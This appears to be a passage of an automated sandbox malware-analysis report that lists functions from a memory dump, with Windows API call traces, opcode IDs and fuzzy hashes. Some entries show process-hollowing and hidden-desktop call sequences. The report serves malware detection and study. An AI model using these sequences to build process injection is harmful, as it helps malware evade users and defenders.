                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 536389180-0
                                                                                                                                                                                                                                • Opcode ID: 5e5347e9b5bf8b3a9a56137cd8fd421550c77a877af5289de6bf04c3aa294c32
                                                                                                                                                                                                                                • Instruction ID: af8971d0bfe6234b74e65027f7861cd804229d1cc746bd04c86e1ad70539891a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e5347e9b5bf8b3a9a56137cd8fd421550c77a877af5289de6bf04c3aa294c32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0811F4B4D1420A9FCF40DF99D8518AEBBF9FB88710B50846AED189B310D770AE108F50
                                                                                                                                                                                                                                Function 01558E1B Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01558E4E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: c1bbc37e2319444bf707335b1f6cf12da68d293322c71e1cf131f3b9656706a1
                                                                                                                                                                                                                                • Instruction ID: eb32a32bd7de05413e55d595090e99e83aa7005ebbd2fdf139122b7f17d75930
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1bbc37e2319444bf707335b1f6cf12da68d293322c71e1cf131f3b9656706a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9F0A471A001097FD750EAAEDC80AAEBBECAF99224F044161FA18DF290D6309D0197A0
                                                                                                                                                                                                                                Function 01558E1D Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01558E4E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 782af006c7522808a00387de2faabe105513cc280fd38096c3fbdb0c4c199da6
                                                                                                                                                                                                                                • Instruction ID: 9b23197927eabaa08ada0d0e2cec106b95a59296bf1e9be4b0ccd3c9fc9b00b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 782af006c7522808a00387de2faabe105513cc280fd38096c3fbdb0c4c199da6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EF0C871A001097FD750EA9EDCC0F9EBBECAF99224F044151FA18DF390D6309D0197A0
                                                                                                                                                                                                                                Function 01542BB1 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 01542BE3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                                                                                • Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                                                                                                                                                • Instruction ID: f70f82bf706f62464a26aa5e59ce93bd6d2737c4f69a9d3abf2920d55d79f39f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F030757045229FCB11EE6CD8C1B9673DC6F9C658F148061B648CF39DEAB0DC4487A2
                                                                                                                                                                                                                                Function 01542051 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 0154206F
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 01542300
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154231E
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154233C
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0154235A
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 015423A3
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegQueryValueExA.ADVAPI32(?,01542565,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001), ref: 015423C1
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegCloseKey.ADVAPI32(?,015423F0,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 015423E3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2796650324-0
                                                                                                                                                                                                                                • Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                                                                                                                                                • Instruction ID: 834689a956eb3908d6261211b0c064952203abdda36090cae867825451d21b3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE06D71A00222CBCB14DE5CD8C0A4737E8BF48754F000551BD58CF247D371D96487D0
                                                                                                                                                                                                                                Function 01544855 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,01556457,00000000,01558867,01558A0D,?,c:\,01558A0D,?,c:\), ref: 01544860
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                                                                                                                                                • Instruction ID: 0689c42e6cb4e8396b891b5cb123c40c058e79ec8fe067ddeab2a0a87477134c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C08CF06012120B7E90A9BD0CC069E02C83DA603CB201F21E138DA5E2E331E8562010
                                                                                                                                                                                                                                Function 01544B6D Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,01556462,00000000,01558867,01558A0D,?,c:\,01558A0D,?,c:\), ref: 01544B7A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4241100979-0
                                                                                                                                                                                                                                • Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                                                                                                                                                • Instruction ID: 5f6f11405b59c8b61478851033df64851d1f514a3f57b9da36f634fa55032bf6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2B092A27542522BEA0039B91CC1B2A008CA7A950AF500931F521CA141D576D8450050
                                                                                                                                                                                                                                Function 015535CF Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                                                                                                • Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941
                                                                                                                                                                                                                                Function 0153E571 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0153E60A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                • Opcode ID: a1bed0b937c79b8bd1586af4ee93c46360e663a9ff0cc2330cbf83af221c867d
                                                                                                                                                                                                                                • Instruction ID: d067ca390922957eaed3df9b2f74f5468453717fda7b9b7be5dad56f59386a8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1bed0b937c79b8bd1586af4ee93c46360e663a9ff0cc2330cbf83af221c867d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E121CCB4605346DFCB51CF2CD881A5ABBE4FF88350F148929F999DB344E330E9548B52
                                                                                                                                                                                                                                Function 0153E4A9 Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0153E522
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                • Opcode ID: 799746e9b1a01add70bf1d4f0f5c1e09c2d6d298bae5fb1f1628dfbcd4265edf
                                                                                                                                                                                                                                • Instruction ID: 265904b305641a2623b44846ab437359a02c336f58a3a3771436e2593d781c3a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 799746e9b1a01add70bf1d4f0f5c1e09c2d6d298bae5fb1f1628dfbcd4265edf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01219E74604302DFC320CF58D885A1ABBE4FB88360F24896DE5E88B391E331E894CF56
                                                                                                                                                                                                                                Function 0153E631 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 0153E6C1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                • Opcode ID: 5d3542ea1408a0efa3efcbe44b54911dce74e080feab6c99fd6457eae64fd466
                                                                                                                                                                                                                                • Instruction ID: 91ff95ecc75e59e58102428c64bc8faa4ff29bcfb2604e8172f80098bfdad31c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3542ea1408a0efa3efcbe44b54911dce74e080feab6c99fd6457eae64fd466
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B21EEB4604306CFC760CF2CD881A1ABBE4FF99350B244969E594CB304D330E948DB52
                                                                                                                                                                                                                                Function 01556DAD Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000002,00000000,01556E1E), ref: 01556DFE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSleepWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1443029356-0
                                                                                                                                                                                                                                • Opcode ID: 632549384a55d612050ca85bbec371cdf87ca1b559a67ab739c6032b9697633f
                                                                                                                                                                                                                                • Instruction ID: d1a6847c34df2de6c56e232bdb94e14600e8f78076cdc698c5c0a771692515aa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632549384a55d612050ca85bbec371cdf87ca1b559a67ab739c6032b9697633f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0A97060464AEFDB44EBE5D89169EB7F8FB94314FA04476E404DB650DB706E50D610
                                                                                                                                                                                                                                Function 01556E24 Relevance: 1.3, APIs: 1, Instructions: 38sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000002,00000000,01556E1E), ref: 01556DFE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSleepWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1443029356-0
                                                                                                                                                                                                                                • Opcode ID: 5081ebc8383093c3d7f3d377fecbf0ec1165e06a6fe3958f42edb3ed63e3f275
                                                                                                                                                                                                                                • Instruction ID: 7f171bc937ac3f48ad8b41f6ac2fdf955cbc289210be49ebaecb7e588bad7598
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5081ebc8383093c3d7f3d377fecbf0ec1165e06a6fe3958f42edb3ed63e3f275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0FC7060454AEFDB44EBE5D8907AEBBF8FB98314FA048B6E404EF550DB306E50D610
                                                                                                                                                                                                                                Function 01564E79 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000155F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0155F000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_155f000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                                                                                                • Instruction ID: af1e1bf8418a814dbe6e109c86ef802b0c205e0ed2f0b9ced38c7a5e41970c0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31D931108642AEEF218AAC8C48BAEFB9CBF05264F000B25F5755F6C2E7309554C7E1

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 0154210D Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0154212A
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0154213B
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 0154216F
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 015421E0
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 0154221B
                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 0154222E
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0154223B
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 01542247
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 0154227B
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 01542287
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 015422B0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                                • Opcode ID: 6029c42cf78fc1e703b39da7c0aac71172400eedb23c868ac797c02fda0520ba
                                                                                                                                                                                                                                • Instruction ID: d7cfef22744dd8bf4b7cf63cd90f6d687e8e5e2790638e0ca512f76fa5de6fdb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6029c42cf78fc1e703b39da7c0aac71172400eedb23c868ac797c02fda0520ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85511B71E0052AEFDB11DFE8DC89AEEBBF8FF88304F040595A559EB241D7309A448B64
                                                                                                                                                                                                                                Function 01559961 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176sleepprocessnativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,01559BA7), ref: 015599C9
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01559A96
                                                                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 01559AAE
                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01559AD6
                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01559B05
                                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 01559B57
                                                                                                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 01559B60
                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 01559B6A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 01559B6F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                • API String ID: 4190092080-2746444292
                                                                                                                                                                                                                                • Opcode ID: fdf5b8b553cd0d2958937f44b12259e14cd52edc7ed8ddb63bd2ed475fa5b3b2
                                                                                                                                                                                                                                • Instruction ID: 213d04f9dc84b3977c919aea0c38af5069526744856eaef434ca772df288e8c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdf5b8b553cd0d2958937f44b12259e14cd52edc7ed8ddb63bd2ed475fa5b3b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2061FC71E0411EAFDB50EBA8CC90BDEB7F8FF88314F544066E108EB250D774AA858B61
                                                                                                                                                                                                                                Function 015564D9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 015565A3
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015565E4
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 01556621
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 0155665A
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 01556692
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015566A5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$Process$DesktopObjectSingleWait
                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                • API String ID: 183768610-2746444292
                                                                                                                                                                                                                                • Opcode ID: 044645fff591b3c0b8891a0aa05f54eea368f7c44cc5c1ed4c4ebace76b80902
                                                                                                                                                                                                                                • Instruction ID: da6bd37e25c5fa12426ba626c1d7f33490a8a11cb617b9d6f834ee3baea81414
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044645fff591b3c0b8891a0aa05f54eea368f7c44cc5c1ed4c4ebace76b80902
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF512A70A4431EBFEB10EFA5CC81F9EB7B8BB54714F604126AA14EF2D0D770AA448B54
                                                                                                                                                                                                                                Function 01559BED Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
